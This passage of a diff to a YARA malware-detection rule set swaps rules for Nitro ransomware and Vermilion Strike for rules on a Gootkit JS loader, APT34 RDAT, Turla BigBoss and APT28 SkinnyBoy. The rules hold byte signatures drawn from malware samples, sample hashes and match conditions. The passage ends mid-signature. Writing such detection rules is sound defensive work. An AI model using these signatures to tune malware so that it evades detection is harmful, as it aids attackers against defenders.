+		$seq2 = { 5a 00 3d 00 14 00 51 00 1f 00 67 00 1c 00 24 00 00 00 00 00 00 00 6f 00 27 00 62 00 5d 00 6d 00 30 00 01 00 27 01 25 00 62 00 7b 00 05 00 56 00 24 00 3c 00 3d 00 5d 00 2e 00 62 00 03 00 0a 00 57 00 6a 00 02 00 5d 00 02 01 23 01 67 00 20 00 54 00 01 00 6c 01 17 00 0b 00 44 00 21 00 1e 00 01 00 52 01 60 00 3b 00 11 00 45 00 2a 00 59 00 2c 00 19 00 00 00 5a 00 1e 00 61 00 5c 00 6b 00 31 00 01 00 1a 01 2d 00 4a 00 6f 00 11 00 57 00 2c 00 3a 00 3a 00 50 00 2a 00 61 00 02 00 07 00 53 00 7b 00 01 01 5b 00 02 01 6a 01 0b 00 03 00 6d 00 43 00 0c 00 64 00 4d 00 44 00 5f 00 08 00 5a 00 68 00 2b 00 32 00 68 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and all of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 6 of ( $s* ) and 1 of ( $seq* )
 }
-rule ARKBIRD_SOLG_RAN_Nitro_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_Loa_JS_Gootkit_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Nitro ransomware"
+		description = "Detect JS loader used on the Gootkit killchain (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "256059b2-1683-5108-8fc8-3cf0b2e7b613"
-		date = "2021-08-12"
-		modified = "2021-08-13"
-		reference = "https://bazaar.abuse.ch/browse/tag/NitroRansomware/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-13/Nitro/RAN_Nitro_Aug_2021_1.yara#L1-L23"
+		id = "649133bd-a44c-5d99-befa-0508fed27ed8"
+		date = "2020-11-21"
+		modified = "2020-11-21"
+		reference = "https://twitter.com/ffforward/status/1330214661577437187"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Gootkit/Loa_JS_Gootkit_Nov_2020_1.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "c31267cd9bc6c63db8e32b2a0e7518b0432d62f1de52117b9e903fc3370a1f4d"
+		logic_hash = "f24d31e7107b8c59b969481596a5e1369933bf2b0fa5117cd1aa5f7ea116d8d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13"
-		hash2 = "6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf"
-		hash3 = "89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559"
-		hash4 = "d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0"
-		hash5 = "dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "7aec3ed791529182c0f64ce34415c3c705a79f3d628cbcff70c34a9f73d8ff42"
 
 	strings:
-		$s1 = { 1f 1a 28 ?? 00 00 0a [0-2] 72 ?? 14 00 70 28 15 00 00 0a 80 32 00 00 04 28 ?? 00 00 06 7e 32 00 00 04 6f ?? 00 00 0a [0-1] 7e 2f 00 00 04 16 7e 32 00 00 04 7e 30 00 00 04 7e 31 00 00 04 60 28 ?? 00 00 06 26 2a }
-		$s2 = { 02 [0-5] 72 df 00 00 70 28 1b 00 00 }
-		$s3 = { 1f 1a 28 ?? 00 00 0a 0a 1f 1c 28 ?? 00 00 0a 0b 7e 21 00 00 04 06 72 ?? 0c 00 70 28 15 00 00 0a 6f 16 00 00 0a [2] ?? 00 }
-		$s4 = { 7e 4e 00 00 0a 0a [0-1] 72 [2] 00 70 73 ?? 00 00 06 0b [0-1] 07 72 [2] 00 70 6f ?? 00 00 06 [1-3] 8d 7f 00 00 01 25 16 1f 0a 9d 6f ?? 00 00 0a 1c 9a 0a [0-1] de ?? 07 2c ?? 07 6f 42 00 00 0a }
-		$s5 = { 7e 4e 00 00 0a 0a [0-1] 73 ?? 00 00 0a 0b [0-1] 07 72 ?? 14 00 70 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 0a }
+		$s1 = { 7b [4-6] 5b [4-6] 5d 28 [4-6] 5b [4-6] 5d 29 28 [4-6] 5b [4-6] 5d 29 3b 7d }
+		$s2 = { 7b 72 65 74 75 72 6e 20 [4-6] 20 25 20 28 [4-6] 2b [4-6] 29 3b 7d }
+		$s3 = { 7b [4-6] 20 3d 20 [4-6] 28 [4-6] 29 2e 73 70 6c 69 74 28 [4-6] 29 3b 7d }
+		$s4 = { 7b 72 65 74 75 72 6e 20 [4-6] 2e 63 68 61 72 41 74 28 [4-6] 29 3b 7d}
+		$s5 = { 7b [4-6] 5b [4-6] 5d 20 3d 20 [4-6] 5b [4-6] 5b [4-6] 5d 5d 3b 7d }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
+		filesize > 1KB and 2 of them
 }
-rule ARKBIRD_SOLG_MAL_Stager_Vermilion_Strike_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT34_RDAT_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect the windows version of the stager of Vermilion Strike implant"
+		description = "Detect RDAT used by APT34"
 		author = "Arkbird_SOLG"
-		id = "7a8ae258-1fb4-5a24-b69e-3a632e00bfae"
-		date = "2021-09-14"
-		modified = "2021-09-16"
-		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Stager_Vermilion_Strike_Sep_2021_1.yara#L1-L18"
+		id = "136f8a9e-e680-5fab-8113-b4d33a47bc34"
+		date = "2021-07-15"
+		modified = "2021-07-16"
+		reference = "https://twitter.com/ShadowChasing1/status/1415206437806960647"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-15/APT34/APT_APT34_RDAT_July_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "cc4d59c92faba1f3435c8454071a1e1c60b6339393796c76e64b890bb85d13cc"
-		score = 50
+		logic_hash = "269788430ca8faff4b0ea5ec7c2a62f99f5f48ef3bc4ea3f7a27f1d735e64819"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "3ad119d4f2f1d8ce3851181120a292f41189e4417ad20a6c86b6f45f6a9fbcfc"
-		level = "experimental"
+		hash1 = "b59dea96ef94e8d32ee1a1805174318643569bbdca0d7569ede19467ff09dcdc"
+		hash2 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c"
+		hash3 = "f9f6dbb09773f708b125a4cca509047eb33c8c53d9e15a8c41ae3d7a8c3e5c7c"
 		tlp = "White"
-		adversary = "Vermilion Strike"
+		adversary = "APT34"
 
 	strings:
-		$s1 = { a1 b0 62 41 00 33 c4 50 8d 84 24 d0 00 00 00 64 a3 00 00 00 00 8b da 8b 84 24 ec 00 00 00 8b b4 24 e0 00 00 00 8b bc 24 e4 00 00 00 8b ac 24 e8 00 00 00 8d 54 24 2c 52 89 44 24 28 89 4c 24 2c e8 95 f0 ff ff 33 c0 89 84 24 d8 00 00 00 c7 84 24 88 00 00 00 0f 00 00 00 89 84 24 84 00 00 00 88 44 24 74 6a 17 68 fc 3b 41 00 8d 44 24 78 c6 84 24 e0 00 00 00 01 e8 9e 0b 00 00 6a 02 68 14 3c 41 00 8d 44 24 78 e8 8e 0b 00 00 6a 00 6a 00 6a 00 6a 01 55 ff 15 44 21 41 00 8b e8 55 6a 02 57 53 8b ce 89 6c 24 2c e8 8d fc ff ff 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 53 56 55 ff 15 58 21 41 00 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 57 68 f8 3b 41 00 50 89 44 24 40 ff 15 4c 21 41 00 }
-		$s2 = { 64 a1 00 00 00 00 50 83 ec 60 a1 b0 62 41 00 33 c4 89 44 24 58 53 55 56 57 a1 b0 62 41 00 33 c4 50 8d 44 24 74 64 a3 00 00 00 00 8b 84 24 88 00 00 00 8b ac 24 84 00 00 00 8b f9 89 44 24 18 33 c0 8d 4c 24 1c 51 8b f2 33 db 89 44 24 30 89 44 24 34 89 44 24 38 89 44 24 3c 89 44 24 40 89 44 24 44 89 44 24 48 89 44 24 4c 89 44 24 50 89 44 24 20 89 44 24 24 89 44 24 28 89 44 24 2c ff 15 2c 21 41 00 85 c0 74 21 39 5c 24 1c 74 05 bb 01 00 00 00 8b 44 24 20 }
-		$s3 = { 50 56 8d 4c 24 58 e8 fc f2 ff ff 6a 01 8d 54 24 18 52 8d 44 24 58 50 89 9c 24 88 00 00 00 33 c0 c6 44 24 20 3d e8 0d 01 00 00 83 f8 ff 74 4f 80 bc 24 8c 00 00 00 00 74 16 56 bb 18 3c 41 00 8d 7c 24 54 e8 8f fd ff ff 83 c4 04 84 c0 75 2f 56 bb 20 3c 41 00 8d 7c 24 54 e8 79 fd ff ff 83 c4 04 84 c0 75 19 56 bb 28 3c 41 00 e8 67 fd ff ff 83 c4 04 84 c0 74 07 c7 45 00 04 00 00 00 83 7c 24 68 10 72 19 }
-		$s4 = { 8d 44 24 18 50 8d 4c 24 18 51 6a 1f 53 c7 44 24 28 04 00 00 00 ff 15 3c 21 41 00 81 4c 24 14 00 01 00 00 6a 04 8d 54 24 18 52 6a 1f 53 }
+		$s1 = { 0a 6f 70 74 20 25 6c 75 28 25 6c 75 29 20 73 74 61 74 20 25 6c 75 28 25 6c 75 29 20 73 74 6f 72 65 64 20 25 6c 75 20 6c 69 74 20 25 75 20 64 69 73 74 20 25 75 }
+		$s2 = { 0a 6c 61 73 74 5f 6c 69 74 20 25 75 2c 20 6c 61 73 74 5f 64 69 73 74 20 25 75 2c 20 69 6e 20 25 6c 64 2c 20 6f 75 74 20 7e 25 6c 64 28 25 6c 64 25 25 29 }
+		$s3 = { 70 65 6e 53 43 4d 61 6e 61 67 65 72 20 66 61 69 6c 65 64 20 28 25 64 29 0a }
+		$s4 = { 43 72 65 61 74 65 53 65 72 76 69 63 65 20 66 61 69 6c 65 64 20 28 25 64 29 0a 00 00 00 00 00 00 53 65 72 76 69 63 65 20 69 6e 73 74 61 6c 6c 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 0a }
+		$s5 = { 49 8b cd ff 15 56 22 07 00 c6 05 87 7b 0a 00 00 c7 05 81 7b 0a 00 60 ea 00 00 49 83 c9 ff 45 33 c0 48 8d 55 20 48 8d 0d f3 7b 0a 00 e8 26 a4 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 00 48 8d 0d bc 7b 0a 00 e8 0f a4 ff ff 41 b8 07 00 00 00 48 8d 15 92 b8 08 00 48 8d 0d 03 7c 0a 00 e8 16 a3 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 40 48 8d 0d 6c 7b 0a 00 e8 df a3 ff ff 41 b8 ?? 00 00 00 48 8d 15 6a b8 08 00 48 8d 0d 13 7c 0a 00 e8 e6 a2 ff ff 48 8d 1d 0f 7d 0a 00 48 8b c3 48 83 3d 1c 7d 0a 00 08 48 0f 43 05 fc 7c 0a 00 48 89 44 24 58 48 8d 05 a0 03 00 00 48 89 44 24 60 48 89 7c 24 68 48 89 7c 24 70 48 8d 4c 24 58 ff 15 4e 21 07 00 85 c0 75 29 48 83 3d e2 7c 0a 00 08 48 0f 43 1d c2 7c 0a 00 48 8b d3 33 c9 ff 15 37 21 07 00 48 85 c0 74 09 48 8b c8 ff 15 f1 20 07 00 83 7c 24 30 02 7f 5d 48 8d 44 24 48 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 0a 71 ff ff 33 d2 33 c9 ff 15 60 22 07 00 48 8d 44 24 50 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 a8 95 ff ff 33 d2 33 c9 ff 15 3e 22 07 00 83 ca ff 48 8b c8 ff 15 f2 20 07 00 b9 64 00 00 00 ff 15 47 22 07 }
+		$s6 = { 48 89 7d f0 48 89 7d f8 45 33 c0 33 d2 48 8d 4d e0 e8 43 a7 ff ff 41 b8 2c 00 00 00 48 8d 15 be bc 08 00 48 8d 4d e0 e8 ad a7 ff ff 48 89 7d 70 48 89 7d 78 45 33 c0 33 d2 48 8d 4d 60 e8 17 a7 ff ff 45 33 c0 48 8d 15 77 94 08 00 48 8d 4d 60 e8 84 a7 ff ff 83 7c 24 30 02 75 6e 48 8d 85 a8 00 00 00 48 89 85 a0 00 00 00 41 b8 03 00 00 00 49 8b 55 08 48 8d 8d a0 00 00 00 e8 c9 0a 00 00 48 8b 95 a0 00 00 00 48 8d 4d a0 e8 89 a5 ff ff 48 8d 85 a8 00 00 00 48 8b 8d a0 00 00 48 89 85 b0 10 00 00 48 8b da 48 8b f9 33 f6 89 74 24 78 c7 45 80 18 00 00 00 c7 45 90 01 00 00 00 48 89 75 88 45 33 c9 4c 8d 45 80 48 8d 54 24 68 48 8d 4c 24 60 ff 15 81 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 60 ff 15 68 fe 06 00 45 33 c9 4c 8d 45 80 48 8d 54 24 70 48 8d 4c 24 58 ff 15 59 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 58 ff 15 40 fe 06 00 33 c0 48 89 45 98 48 89 45 a0 48 89 45 a8 33 d2 44 8d 46 68 48 8d 4d c0 e8 ab 89 04 00 c7 45 c0 68 00 00 00 48 8b 44 24 68 48 89 45 20 48 8b 44 24 70 48 89 45 18 81 4d fc 00 01 00 00 48 8b d3 48 8d 4d 30 e8 bf fe ff ff 90 4c 8b c0 48 8d 8d 90 00 00 00 e8 9f 0d 00 00 90 45 33 c0 b2 01 48 8d 4d 30 e8 d0 7d ff ff 48 8d 95 90 00 00 00 48 83 bd a8 00 00 00 08 48 0f 43 95 90 00 00 00 48 8d 45 98 48 89 44 24 48 48 8d 45 c0 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 a7 fd 06 00 48 8b 4c 24 68 ff 15 94 fd 06 00 48 8b 4c 24 70 ff 15 89 fd 06 00 48 89 b5 80 00 00 00 48 89 b5 88 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 30KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Beacon_Vermilion_Strike_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Turla_Bigboss_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect the windows version of the beacon of Vermilion Strike implant"
+		description = "Detects new BigBoss implants (SilentMoon/GoldenSky)"
 		author = "Arkbird_SOLG"
-		id = "61bb0f02-0eb3-5abe-a2fc-65b94a9486f7"
-		date = "2021-09-14"
-		modified = "2021-09-16"
-		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Beacon_Vermilion_Strike_Sep_2021_1.yara#L1-L20"
+		id = "6f6c8d1e-f2c7-5f08-b1dc-ce726c6d89be"
+		date = "2021-04-06"
+		modified = "2021-07-17"
+		reference = "https://twitter.com/DrunkBinary/status/1304086230540390400"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-17/BigBoss/APT_Turla_BigBoss_Apr_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "801d93fc250666a48fbdd504c8bacab74f0bf7f534a7301a20ad79df3b41750d"
+		logic_hash = "ce0ffdad9eecb79128b6c08c87914f356c86ac631655c76905a06d953add3998"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "c49631db0b2e41125ccade68a0fe7fb70939315f1c580510e40e5b30ead868f5"
-		hash2 = "07b815cee2b85a41820cd8157a68f35aa1ed0aa5f4093b8cb79a1d645a16273f"
-		hash3 = "7129434afc1fec276525acfeee5bb08923ccd9b32269638a54c7b452f5493492"
-		tlp = "White"
-		adversary = "Vermilion Strike"
+		hash1 = "94421ccb97b784c43d92c4b1438481eee9c907db6b13f6cfc4b86a6bb057ddcd"
+		hash2 = "67bfa585ace8df20deb1d8a05bd4acf2c84c6fa0966276b3ea7607056abe25bb"
+		hash3 = "6ca0b4efe077fe05b2ae871bf50133c706c7090a54d2c3536a6c86ff454caa9a"
 
 	strings:
-		$s1 = { 50 c7 03 01 00 00 00 e8 cc ?? 00 00 89 43 04 83 f8 ff 74 2c 8b 4d 08 6a 00 8d 44 24 0c 50 53 6a 08 6a 01 51 e8 91 ?? 00 00 85 c0 75 13 8b 44 24 08 66 83 78 08 01 6a 01 50 74 38 e8 80 ?? 00 00 8b 4e 10 2b 4e 0c b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 47 03 c2 3b f8 0f 8c 30 ff ff ff 53 ff 15 }
-		$s2 = { 8b 4c 24 1c 6a 00 6a 00 6a 00 6a 01 51 ff 15 5c a2 02 10 8b 55 0c 8b f0 56 6a 02 53 52 8b cf 89 74 24 34 e8 f0 fb ff ff 8b 45 0c 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 50 57 56 ff 15 50 a2 02 10 8b 4c 24 30 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 53 51 50 89 44 24 3c ff 15 64 a2 02 10 8b f8 89 7c 24 14 8d 49 00 8b b4 24 90 00 00 00 8b 5c 24 7c 8b c3 83 fe 10 73 04 8d 44 24 7c 8d 50 01 8d a4 24 00 00 00 00 8a 08 40 84 c9 75 f9 2b c2 8b cb 83 fe 10 73 04 8d 4c 24 7c 8b 55 20 52 8b 54 24 2c 52 50 51 57 ff 15 4c a2 02 10 85 }
-		$s3 = { 68 00 00 00 10 6a 00 6a 00 6a 00 6a 00 c7 44 24 60 01 00 00 00 ff 15 40 a2 02 10 8b d8 8d 54 24 2c 52 8d 44 24 3c 50 55 53 ff 15 38 a2 02 10 8b e8 85 db 74 07 53 ff 15 44 a2 02 10 85 ed 74 2f 8b }
-		$s4 = { 6a ff 68 [2] 02 10 64 a1 00 00 00 00 50 81 ec 14 01 00 00 a1 c0 72 03 10 33 c4 89 84 24 10 01 00 00 53 a1 c0 72 03 10 33 c4 50 8d 84 24 1c 01 00 00 64 a3 00 00 00 00 33 db 8d 44 24 0c 89 9c 24 24 01 00 00 50 8d 4c 24 18 89 5c 24 0c 51 89 74 24 18 c7 44 24 14 04 01 00 00 ff 15 04 a0 02 10 8d 44 24 14 c7 46 18 0f 00 00 00 89 5e 14 88 5e 04 8d 50 01 8a 08 40 3a cb 75 f9 2b c2 50 8d 54 24 18 52 8b ce e8 [2] ff ff 89 9c 24 24 01 00 00 c7 44 24 08 01 00 00 00 e8 d1 fe ff ff 85 c0 8b c6 74 0e 6a 02 68 ?? c6 02 10 e8 [2] ff ff 8b c6 8b 8c 24 1c 01 00 00 64 89 0d 00 00 00 00 59 5b 8b 8c 24 }
-		$s5 = { a1 c0 72 03 10 33 c4 89 44 24 2c 68 00 00 00 f0 6a 18 6a 00 6a 00 68 4c 97 03 10 ff 15 30 a0 02 10 85 c0 75 11 33 c0 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 58 97 03 10 8b 0d 54 97 03 10 68 50 97 03 10 6a 00 33 c0 6a 00 66 89 44 24 1e a1 5c 97 03 10 89 54 24 2c 6a 1c 8d 54 24 20 89 44 24 34 a1 4c 97 03 10 89 4c 24 2c 8b 0d 60 97 03 10 52 50 c6 44 24 28 08 c6 44 24 29 02 c7 44 24 2c 0e 66 00 00 c7 44 24 30 10 00 00 00 89 4c 24 40 ff 15 2c a0 02 10 85 c0 74 87 8b 0d 50 97 03 10 56 8b 35 38 a0 02 10 6a 00 68 ?? 82 03 10 6a 01 51 c7 44 24 18 01 00 00 00 c7 44 24 20 01 00 00 00 ff d6 85 c0 74 2b a1 50 97 03 10 6a 00 8d 54 24 0c 52 6a 03 50 ff d6 85 c0 74 16 8b 15 50 97 03 10 6a 00 8d 4c 24 14 51 6a 04 52 ff d6 85 c0 75 12 33 c0 5e 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 50 97 03 10 6a }
+		$s1 = { 55 8b ec a1 [2] 40 00 83 ec 3c 50 6a 3c 8d 4d c4 51 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 78 ?? 40 00 8d 45 c4 8d 50 02 8d 49 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 75 1c 8b 15 [2] 40 00 52 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 [2] 40 00 8b e5 }
+		$s2 = { 5c 00 5c 00 2e 00 5c 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 50 00 49 00 50 00 45 00 5c }
+		$s3 = { 5c 5c 25 73 5c 70 69 70 65 5c 25 73 }
+		$s4 = { 5c 00 69 00 6e 00 66 00 5c 00 00 00 [4-16] 2e 00 69 00 6e 00 66 }
+		$s5 = "%d blocks, %d sorted, %d scanned" ascii fullword
+		$s6 = "REMOTE_NS:ERROR:%d" ascii fullword
+		$s7 = { 5c 5c 25 73 5c 69 70 63 24 }
+		$s8 = { 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 6c 00 61 00 6e 00 6d 00 61 00 6e 00 73 00 65 00 72 00 76 00 65 00 72 00 5c 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 73 00 00 00 4e 00 75 00 6c 00 6c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 50 00 69 00 70 00 65 00 73 00 00 00 00 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4c 00 53 00 41 00 00 00 00 00 52 00 65 00 73 00 74 00 72 00 69 00 63 00 74 00 41 00 6e 00 6f 00 6e 00 79 00 6d 00 6f 00 75 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 30KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 7 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_ELF_Vermilion_Strike_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Skinnyboy_Implant_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect the ELF version of Vermilion Strike implant"
+		description = "Detect SkinnyBoy Implant"
 		author = "Arkbird_SOLG"
-		id = "bfc498b6-4d3d-5ae9-a360-d31f8cf6c5fc"
-		date = "2021-09-14"
-		modified = "2021-09-16"
-		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_ELF_Vermilion_Strike_Sep_2021_1.yara#L1-L19"
+		id = "2c78e0f3-a0b3-56fb-b4d2-313c03f1331b"
+		date = "2021-06-05"
+		modified = "2021-06-06"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Implant_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "fe4bb6da7b29f1ae7c25a657d27f5e60ffa0e7d9f1f09a5a2331e4a80eb79481"
-		score = 50
+		logic_hash = "37d6b03adaad0a97e91a366d8e5ce47bc0eb77263849422129edf9df28d25bd8"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc"
-		level = "experimental"
+		hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
 		tlp = "White"
-		adversary = "Vermilion Strike"
+		adversary = "APT28"
 
 	strings:
-		$s1 = { be bd f8 40 00 41 55 49 89 fd bf a3 f8 40 00 41 54 55 53 48 81 ec 20 04 00 00 e8 4f cb ff ff 48 85 c0 48 89 c5 0f 84 af 01 00 00 48 8d 5c 24 20 41 bc 0a 00 00 00 41 be b0 32 40 00 66 90 48 89 ea be c8 00 00 00 48 89 df e8 30 cd ff ff 48 85 c0 0f 84 4f 01 00 00 80 7c 24 20 23 74 e0 bf b4 f8 40 00 48 89 de 4c 89 e1 f3 a6 75 d1 be d4 1d 41 }
-		$s2 = { 8b 43 14 8b 73 10 8b 4b 0c 8d 56 01 44 8d 80 6c 07 00 00 be 70 21 41 00 31 c0 e8 ed 34 ff ff 48 85 ed 74 28 8b 4b 04 8b 53 08 48 89 ef 44 8b 03 48 83 c4 08 be 79 21 41 00 5b 5d }
-		$s3 = { 55 53 48 83 ec 70 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 40 48 89 44 24 08 8b 84 24 90 00 00 00 89 04 24 e8 22 fb ff ff e8 fd 58 ff ff e8 38 5a ff ff e8 f3 59 ff ff 0f 1f 00 e8 5b 5e ff ff 48 89 c7 e8 23 5b ff ff 48 89 c7 48 89 c5 e8 18 5f ff ff 48 8d 4c 24 50 31 d2 be 6e 00 00 00 48 89 c7 48 89 c3 e8 41 59 ff ff 48 8b 7c 24 50 31 c9 ba 04 00 00 00 be 21 00 00 00 e8 1b 60 ff ff 48 8d 54 24 2f 48 8d 7c 24 60 4c 89 e6 e8 d9 5c ff ff 48 8d 7c 24 60 ba 88 f8 40 00 be a7 20 41 00 e8 a5 1f 00 00 48 8b 4c 24 60 31 d2 be 64 00 00 00 48 89 df e8 f1 58 ff ff 31 c9 31 d2 be 65 00 00 00 48 89 df e8 e0 58 ff ff 48 85 c0 7e 73 48 8b 7c 24 50 e8 41 58 ff ff 8b 54 24 30 48 8b 74 24 40 48 89 df e8 50 59 ff ff 48 8b 7c 24 40 e8 66 12 00 00 48 8b 94 24 a0 00 00 00 48 8b b4 24 98 00 00 00 48 89 df e8 0e fd ff ff 48 89 df e8 b6 5f ff ff 48 89 ef e8 ce 58 ff ff b8 01 00 00 00 48 8b 54 24 60 48 8d 7a e8 48 81 ff c0 54 61 00 75 23 48 83 c4 70 5b 5d 41 5c c3 66 0f 1f 44 00 00 48 89 df e8 80 5f ff ff 48 89 ef e8 98 58 ff ff 31 c0 eb cb be b0 32 40 00 48 8d 4f 10 48 85 f6 74 3d 83 ca ff }
-		$s4 = { 8b 15 6e e4 20 00 31 ff be e0 57 61 00 e8 0a b8 ff ff 48 89 c7 31 c0 48 85 ff 74 17 48 89 3d e9 e4 20 00 e8 a4 bf ff ff 89 05 e6 e4 20 00 b8 01 00 }
-		$s5 = { b8 02 00 00 00 48 89 fb 48 83 ec 10 66 89 04 25 00 00 00 00 e8 a6 4e ff ff 83 f8 ff 89 04 24 74 16 89 04 25 04 00 00 00 b8 01 00 00 00 48 83 c4 10 5b c3 0f 1f 40 00 48 89 df e8 f0 4e ff ff 48 89 c1 31 c0 48 85 }
+		$s1 = { 55 8b ec 81 ec 48 01 00 00 a1 00 00 01 10 33 c5 89 45 fc 53 56 57 6a 00 6a 00 6a 00 8b c2 6a 00 68 6c ef 00 10 89 85 d0 fe ff ff 89 8d cc fe ff ff 89 85 e4 fe ff ff c7 85 c0 fe ff ff 01 00 00 00 c7 85 d8 fe ff ff 00 00 00 00 c7 85 dc fe ff ff 00 00 00 00 ff 15 e4 b1 00 10 8b 1d a4 b0 00 10 8b f0 89 b5 d4 fe ff ff ff d3 8b 3d d4 b1 00 10 85 f6 74 26 6a 04 8d 85 ec fe ff ff 50 6a 06 56 c7 85 ec fe ff ff c0 27 09 00 ff d7 6a 04 8d 85 ec fe ff ff 50 6a 05 56 ff d7 ff d3 85 f6 74 22 6a 01 6a 00 6a 03 6a 00 6a 00 68 bb 01 00 00 ff b5 cc fe ff ff 56 ff 15 cc b1 00 10 89 85 d8 fe ff ff ff d3 8b 4d 08 8b 3d e8 b1 00 10 81 f9 00 00 a0 00 0f 83 a7 01 00 00 68 03 01 00 00 8d 85 f1 fe ff ff 6a 00 50 c6 85 f0 fe ff ff 00 e8 3c 33 00 00 83 c4 0c ba 01 00 00 00 6a 00 6a 01 8d 8d f0 fe ff ff e8 55 f7 ff ff 83 c4 08 8d 55 08 8d 8d e4 fe ff ff e8 94 f6 ff ff 8d bd f0 fe ff ff 8d 4f 01 8a 07 47 84 c0 75 f9 8b 75 08 2b f9 8d 04 37 50 6a 08 89 85 e0 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 57 8d 8d f0 fe ff ff 51 50 89 85 d0 fe ff ff e8 62 6e 00 00 8b 85 d0 fe ff 